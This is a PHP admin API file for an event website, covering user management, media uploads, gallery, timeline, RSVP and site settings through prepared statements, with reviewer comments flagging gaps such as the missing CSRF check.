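<?php
/**
 * Admin JSON API for the event site (admin/api.php).
 *
 * Every request is a POST whose `action` field selects one case of the switch
 * below. The reply is always a JSON object with `success` (bool) and `message`
 * (string); upload actions add `path`. An `admin_user` session (established
 * elsewhere) is required before anything runs.
 *
 * NOTE(review): no CSRF token is checked on this endpoint, and every action
 * mutates the database or the filesystem; confirm the admin pages send one and
 * validate it here rather than relying on the session cookie alone.
 */
session_start();
header('Content-Type: application/json');

// Verificar autenticación — reject before the database connection is opened.
if (!isset($_SESSION['admin_user'])) {
    echo json_encode(['success' => false, 'message' => 'No autorizado']);
    exit;
}

require_once 'includes/db.php';

/** Media directory relative to the site root (this script runs one level below it, hence the '../' prefix when writing). */
const IMAGES_DIR = 'public/assets/images/';
/** Gallery ("historia") uploads live in their own sub-directory. */
const GALLERY_DIR = 'public/assets/images/historia/';
/** Extension allow-lists. Only the extension of the client-supplied name is checked; file content is not inspected. */
const IMAGE_EXTS = ['jpg', 'jpeg', 'png', 'webp', 'gif'];
const VIDEO_EXTS = ['mp4', 'webm', 'ogg'];
const AUDIO_EXTS = ['mp3', 'ogg', 'wav'];
/** hero_settings columns an upload action may write; guards the column name interpolated in handleHeroUpload(). */
const HERO_MEDIA_COLUMNS = ['portrait_image', 'video_path', 'bg_image_path', 'bg_video_path'];

/**
 * Reads a POST field as a trimmed string.
 *
 * Non-string values (e.g. `name[]=x`) count as absent so that trim() cannot
 * throw a TypeError on request data of the wrong shape.
 */
function postString(string $key, string $default = ''): string
{
    $value = $_POST[$key] ?? null;
    return is_string($value) ? trim($value) : $default;
}

/**
 * Returns the $_FILES entry for $field when a file arrived without error,
 * or null otherwise.
 */
function uploadedFile(string $field): ?array
{
    $file = $_FILES[$field] ?? null;
    if (!is_array($file) || ($file['error'] ?? null) !== UPLOAD_ERR_OK) {
        return null;
    }
    return $file;
}

/** Lower-cased extension of the client-supplied file name (no content sniffing). */
function uploadExtension(array $file): string
{
    return strtolower(pathinfo((string) ($file['name'] ?? ''), PATHINFO_EXTENSION));
}

/**
 * Moves an uploaded file into $relativeDir (relative to the site root) under
 * $filename, creating the directory if needed.
 *
 * @return string|null the stored path relative to the site root, or null if the move failed
 */
function storeUpload(array $file, string $relativeDir, string $filename): ?string
{
    $targetDir = '../' . $relativeDir;
    if (!is_dir($targetDir)) {
        mkdir($targetDir, 0755, true);
    }
    if (!move_uploaded_file($file['tmp_name'], $targetDir . $filename)) {
        return null;
    }
    return $relativeDir . $filename;
}

/**
 * Best-effort removal of a stored media file, refusing anything that resolves
 * outside the media directory (the path comes from the database, not from
 * this request, but a tampered row must not be able to delete arbitrary files).
 */
function deleteStoredFile(string $relativePath): void
{
    $base = realpath('../' . rtrim(IMAGES_DIR, '/'));
    $target = realpath('../' . $relativePath);
    if ($base === false || $target === false || !is_file($target)) {
        return;
    }
    if (strpos($target, $base . DIRECTORY_SEPARATOR) !== 0) {
        return; // outside the media directory: leave it alone
    }
    @unlink($target); // best-effort, as in the original: a leftover file is not an error for the caller
}

/**
 * Processes a single-slot hero upload (portrait, video, background image/video).
 *
 * @param PDO          $db            open connection (assumes getDB() returns PDO — confirm in includes/db.php)
 * @param string       $field         $_FILES key to read
 * @param string       $prefix        stored-file name prefix, e.g. 'portada_'
 * @param list<string> $allowed       permitted extensions
 * @param string       $column        hero_settings column to update; must be in HERO_MEDIA_COLUMNS
 * @param string       $formatMessage reply when the extension is not allowed
 * @param string       $okMessage     reply on success
 * @return array|null  response array, or null when no file was received so the
 *                     caller keeps its default response
 * @throws InvalidArgumentException if $column is not an allowed column
 */
function handleHeroUpload(PDO $db, string $field, string $prefix, array $allowed, string $column, string $formatMessage, string $okMessage): ?array
{
    if (!in_array($column, HERO_MEDIA_COLUMNS, true)) {
        throw new InvalidArgumentException('Unknown hero media column');
    }
    $file = uploadedFile($field);
    if ($file === null) {
        return null;
    }
    $ext = uploadExtension($file);
    if (!in_array($ext, $allowed, true)) {
        return ['success' => false, 'message' => $formatMessage];
    }
    $relativePath = storeUpload($file, IMAGES_DIR, $prefix . time() . '.' . $ext);
    if ($relativePath === null) {
        return ['success' => false, 'message' => 'Error al mover archivo'];
    }
    // $column is a code literal validated against HERO_MEDIA_COLUMNS above, never request data.
    $db->prepare('UPDATE hero_settings SET ' . $column . '=? WHERE id=1')->execute([$relativePath]);
    return ['success' => true, 'message' => $okMessage, 'path' => $relativePath];
}

/** Writes one site_settings row (assumes $db is PDO — confirm). */
function setSetting(PDO $db, string $key, string $value): void
{
    $db->prepare('UPDATE site_settings SET setting_value = ? WHERE setting_key = ?')->execute([$value, $key]);
}

$db = getDB();
$action = postString('action');
$response = ['success' => false, 'message' => 'Acción no válida'];

try {
    switch ($action) {
        // ============ USERS ============
        case 'save_user':
            $id = postString('id');
            $name = postString('name');
            $email = postString('email');
            // Passwords are taken verbatim (no trim) so surrounding spaces survive hashing.
            $password = $_POST['password'] ?? '';
            if (!is_string($password)) {
                $password = '';
            }
            // NOTE(review): $role is stored as sent; the set of valid roles is not visible here — confirm whether it should be restricted.
            $role = postString('role', 'admin');
            if ($name === '' || $email === '') {
                $response = ['success' => false, 'message' => 'Nombre y email son obligatorios'];
                break;
            }
            if ($id !== '') {
                // Update; the password is only replaced when a new one was supplied.
                if ($password !== '') {
                    $hash = password_hash($password, PASSWORD_DEFAULT);
                    $stmt = $db->prepare('UPDATE users SET name=?, email=?, password=?, role=? WHERE id=?');
                    $stmt->execute([$name, $email, $hash, $role, $id]);
                } else {
                    $stmt = $db->prepare('UPDATE users SET name=?, email=?, role=? WHERE id=?');
                    $stmt->execute([$name, $email, $role, $id]);
                }
                $response = ['success' => true, 'message' => 'Usuario actualizado'];
            } else {
                // Insert: a password is mandatory for a new account.
                if ($password === '') {
                    $response = ['success' => false, 'message' => 'La contraseña es obligatoria para nuevos usuarios'];
                    break;
                }
                $hash = password_hash($password, PASSWORD_DEFAULT);
                $stmt = $db->prepare('INSERT INTO users (name, email, password, role) VALUES (?, ?, ?, ?)');
                $stmt->execute([$name, $email, $hash, $role]);
                $response = ['success' => true, 'message' => 'Usuario creado'];
            }
            break;

        case 'delete_user':
            $id = postString('id');
            // Strict string comparison instead of `==`; an admin must not remove its own account.
            if ($id === (string) ($_SESSION['admin_user']['id'] ?? '')) {
                $response = ['success' => false, 'message' => 'No puedes eliminar tu propia cuenta'];
                break;
            }
            $db->prepare('DELETE FROM users WHERE id = ?')->execute([$id]);
            $response = ['success' => true, 'message' => 'Usuario eliminado'];
            break;

        // ============ HERO ============
        case 'save_hero':
            $stmt = $db->prepare('UPDATE hero_settings SET name = ?, subtitle = ?, description = ?, media_type = ?, bg_media_type = ?, media_shape = ? WHERE id = 1');
            $stmt->execute([
                postString('name'),
                postString('subtitle'),
                postString('description'),
                postString('media_type', 'image'),
                postString('bg_media_type', 'color'),
                postString('media_shape', 'circle'),
            ]);
            $response = ['success' => true, 'message' => 'Hero actualizado'];
            break;

        case 'upload_hero_image':
            $response = handleHeroUpload($db, 'image', 'portada_', IMAGE_EXTS, 'portrait_image',
                'Formato no permitido', 'Imagen subida') ?? $response;
            break;

        case 'upload_hero_video':
            $response = handleHeroUpload($db, 'video', 'hero_video_', VIDEO_EXTS, 'video_path',
                'Formato no permitido (solo MP4, WebM, OGG)', 'Video subido') ?? $response;
            break;

        case 'upload_hero_bg_image':
            // Previously accepted any extension; now restricted to images like the other image uploads.
            $response = handleHeroUpload($db, 'image', 'hero_bg_', IMAGE_EXTS, 'bg_image_path',
                'Formato no permitido', 'Fondo de imagen subido') ?? $response;
            break;

        case 'upload_hero_bg_video':
            $response = handleHeroUpload($db, 'video', 'hero_bg_video_', VIDEO_EXTS, 'bg_video_path',
                'Formato no permitido (solo MP4, WebM, OGG)', 'Fondo de video subido') ?? $response;
            break;

        // ============ COUNTDOWN ============
        case 'save_countdown':
            $stmt = $db->prepare('UPDATE countdown_settings SET event_date=?, section_title=?, section_subtitle=?, is_active=? WHERE id=1');
            $stmt->execute([
                postString('event_date'),
                postString('section_title'),
                postString('section_subtitle'),
                (int) postString('is_active', '0'),
            ]);
            $response = ['success' => true, 'message' => 'Countdown actualizado'];
            break;

        // ============ TIMELINE ============
        case 'save_timeline':
            $id = postString('id');
            $data = [
                postString('event_time'),
                postString('icon', 'ph-fill ph-star'),
                postString('title'),
                (int) postString('sort_order', '0'),
            ];
            if ($id !== '') {
                $stmt = $db->prepare('UPDATE timeline_events SET event_time=?, icon=?, title=?, sort_order=? WHERE id=?');
                $stmt->execute([...$data, $id]);
                $response = ['success' => true, 'message' => 'Evento actualizado'];
            } else {
                $stmt = $db->prepare('INSERT INTO timeline_events (event_time, icon, title, sort_order) VALUES (?,?,?,?)');
                $stmt->execute($data);
                $response = ['success' => true, 'message' => 'Evento creado'];
            }
            break;

        case 'delete_timeline':
            $db->prepare('DELETE FROM timeline_events WHERE id=?')->execute([postString('id')]);
            $response = ['success' => true, 'message' => 'Evento eliminado'];
            break;

        // ============ GALLERY ============
        case 'upload_gallery_image':
            $file = uploadedFile('image');
            if ($file === null) {
                break;
            }
            $ext = uploadExtension($file);
            if (in_array($ext, VIDEO_EXTS, true)) {
                $mediaType = 'video';
            } elseif (in_array($ext, IMAGE_EXTS, true)) {
                $mediaType = 'image';
            } else {
                $response = ['success' => false, 'message' => 'Formato no permitido (JPG, PNG, WEBP, GIF, MP4, WEBM, OGG)'];
                break;
            }
            // random_int() replaces rand(): the suffix only de-duplicates same-second uploads, but CSPRNG costs nothing here.
            $filename = 'gallery_' . time() . '_' . random_int(100, 999) . '.' . $ext;
            $relativePath = storeUpload($file, GALLERY_DIR, $filename);
            if ($relativePath === null) {
                $response = ['success' => false, 'message' => 'Error al mover el archivo'];
                break;
            }
            $stmt = $db->prepare('INSERT INTO gallery_images (image_path, media_type, alt_text, sort_order) VALUES (?, ?, ?, ?)');
            $stmt->execute([$relativePath, $mediaType, '', 0]);
            $response = ['success' => true, 'message' => ucfirst($mediaType) . ' subido correctamente'];
            break;

        case 'delete_gallery_image':
            $id = postString('id');
            $img = $db->prepare('SELECT image_path FROM gallery_images WHERE id=?');
            $img->execute([$id]);
            $row = $img->fetch();
            if ($row) {
                deleteStoredFile((string) $row['image_path']);
                $db->prepare('DELETE FROM gallery_images WHERE id=?')->execute([$id]);
            }
            // Reported as success even when no row matched, as before.
            $response = ['success' => true, 'message' => 'Imagen eliminada'];
            break;

        // ============ PANELS ============
        case 'save_panel':
            $id = postString('id');
            $data = [
                postString('icon', 'ph-fill ph-star'),
                postString('title'),
                postString('subtitle'),
                postString('description'),
                (int) postString('sort_order', '0'),
            ];
            if ($id !== '') {
                $stmt = $db->prepare('UPDATE info_panels SET icon=?, title=?, subtitle=?, description=?, sort_order=? WHERE id=?');
                $stmt->execute([...$data, $id]);
                $response = ['success' => true, 'message' => 'Panel actualizado'];
            } else {
                $stmt = $db->prepare('INSERT INTO info_panels (icon, title, subtitle, description, sort_order) VALUES (?,?,?,?,?)');
                $stmt->execute($data);
                $response = ['success' => true, 'message' => 'Panel creado'];
            }
            break;

        case 'delete_panel':
            $db->prepare('DELETE FROM info_panels WHERE id=?')->execute([postString('id')]);
            $response = ['success' => true, 'message' => 'Panel eliminado'];
            break;

        // ============ GUESTBOOK ============
        case 'delete_message':
            $db->prepare('DELETE FROM guestbook_messages WHERE id=?')->execute([postString('id')]);
            $response = ['success' => true, 'message' => 'Mensaje eliminado'];
            break;

        // ============ RSVP ============
        case 'delete_rsvp':
            $db->prepare('DELETE FROM rsvp_confirmations WHERE id=?')->execute([postString('id')]);
            $response = ['success' => true, 'message' => 'Confirmación eliminada'];
            break;

        // ============ LOCATION ============
        case 'save_location':
            $mapUrl = postString('map_embed_url');
            // Accept a pasted <iframe ...> snippet and keep only its src URL.
            if (strpos($mapUrl, '<iframe') !== false && preg_match('/src=["\']([^"\']+)["\']/i', $mapUrl, $matches)) {
                $mapUrl = $matches[1];
            }
            $stmt = $db->prepare('UPDATE location_settings SET venue_name=?, address=?, date_text=?, time_text=?, map_embed_url=?, directions_url=? WHERE id=1');
            $stmt->execute([
                postString('venue_name'),
                postString('address'),
                postString('date_text'),
                postString('time_text'),
                $mapUrl,
                postString('directions_url'),
            ]);
            $response = ['success' => true, 'message' => 'Ubicación actualizada'];
            break;

        // ============ CTA ============
        case 'save_cta':
            $stmt = $db->prepare('UPDATE cta_settings SET title=?, description=?, deadline_text=?, button_text=? WHERE id=1');
            $stmt->execute([
                postString('title'),
                postString('description'),
                postString('deadline_text'),
                postString('button_text'),
            ]);
            $response = ['success' => true, 'message' => 'CTA actualizado'];
            break;

        // ============ SETTINGS ============
        case 'save_settings':
            $settingsKeys = [
                'site_title', 'monogram', 'whatsapp_number', 'footer_brand', 'footer_link',
                'overlay_title', 'overlay_subtitle', 'overlay_instruction',
                'overlay_letter_pre', 'overlay_letter_title', 'overlay_letter_post',
                'color_bg', 'color_text', 'color_purple', 'color_gold',
                'dark_bg', 'dark_text', 'dark_purple', 'dark_gold',
                'whatsapp_msg_yes', 'whatsapp_msg_no', 'overlay_flowers_image',
                'music_file', 'music_enabled', 'special_effects_type', 'site_theme',
                'story_show', 'story_title', 'story_content', 'story_image',
                'quote_show', 'quote_text', 'quote_author',
                'site_font_primary', 'site_font_secondary',
                'share_title', 'share_text', 'footer_text',
            ];
            // File-backed settings: key => [stored-name prefix, allowed extensions].
            // A disallowed extension is silently skipped, as before.
            $settingUploads = [
                'story_image' => ['story_', IMAGE_EXTS],
                'overlay_flowers_image' => ['overlay_decor_', IMAGE_EXTS],
                'music_file' => ['musica_', AUDIO_EXTS],
            ];
            foreach ($settingUploads as $key => [$prefix, $allowed]) {
                $file = uploadedFile($key);
                if ($file === null) {
                    continue;
                }
                $ext = uploadExtension($file);
                if (!in_array($ext, $allowed, true)) {
                    continue;
                }
                $stored = storeUpload($file, IMAGES_DIR, $prefix . time() . '.' . $ext);
                if ($stored !== null) {
                    setSetting($db, $key, $stored);
                }
            }
            // Text settings: only keys present in the request are written.
            foreach (array_diff($settingsKeys, array_keys($settingUploads)) as $key) {
                if (isset($_POST[$key])) {
                    setSetting($db, $key, postString($key));
                }
            }
            $response = ['success' => true, 'message' => 'Configuración guardada'];
            break;
    }
} catch (Exception $e) {
    // NOTE(review): the raw exception text (e.g. driver errors) is returned to the
    // authenticated admin; consider logging it server-side and replying generically.
    $response = ['success' => false, 'message' => 'Error: ' . $e->getMessage()];
}

echo json_encode($response);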